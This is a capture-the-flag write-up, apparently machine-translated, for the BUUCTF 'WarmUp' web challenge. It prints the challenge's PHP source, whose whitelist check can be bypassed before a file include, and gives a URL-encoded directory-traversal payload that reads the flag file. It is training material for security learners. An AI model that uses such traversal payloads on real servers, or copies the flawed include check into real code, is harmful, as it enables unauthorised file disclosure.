BUUCTF web WarmUp

Topic link ：BUUCTF Online evaluation (buuoj.cn)

Visit topic link , See a big funny face

Have a look first f12, Prompt Sourc.php

visit Sourc.php

contain source.php and hint.php, visit hint.php

guess flag stay ffffllllaaaagggg in

Observe Sourc.php in Code and emoji Link to , Guess it's test Code audit and directory traversal

Code audit

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {     // Determine whether the variable is declared , Whether it's a string 
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {   // Whether it matches the white list 
                return true;
            }

            $_page = mb_substr(   // Intercept ？ Previous string 
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {  // Match the white list for the second time 
                return true;
            }

            $_page = urldecode($page);   //url Yes $page decode 
            $_page = mb_substr(          // Second interception ？ Previous string 
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {    Match the white list for the third time 
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])  // Non empty 
        && is_string($_REQUEST['file'])   // Is string 
        && emmm::checkFile($_REQUEST['file'])   // Pass verification 
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

First look at the main part of the code , Yes file Parameters 3 Second judgment ：1. Is it not empty? 2. Whether it's a string 3. Whether it can pass checkFile Function verification .3 After passing all the judgments , To include .
checkFile function ：
1. First set the white list , Contains only source.php and hint.php
2. Yes $page Judge , Judge page? Whether the previous parameters are in the white list
3. Admitted url code , Decoded once , Check again

Try to construct payload:

file=source.php?../../../../../ffffllllaaaagggg

Something went wrong , There is one URL Coding problem

take ？ Change to %3F

structure payload:

file=source.php%3F../../../../../ffffllllaaaagggg

Succeed in getting flag

The problem of code audit is to understand the code first , Then construct the corresponding payload.

Reference link ：

buuctf-[HCTF 2018]WarmUp1( Xiaoyute detailed explanation )_ Xiaoyute's detailed blog -CSDN Blog

BUUCTF web WarmUp_A_dmins The blog of -CSDN Blog _buuctf warmup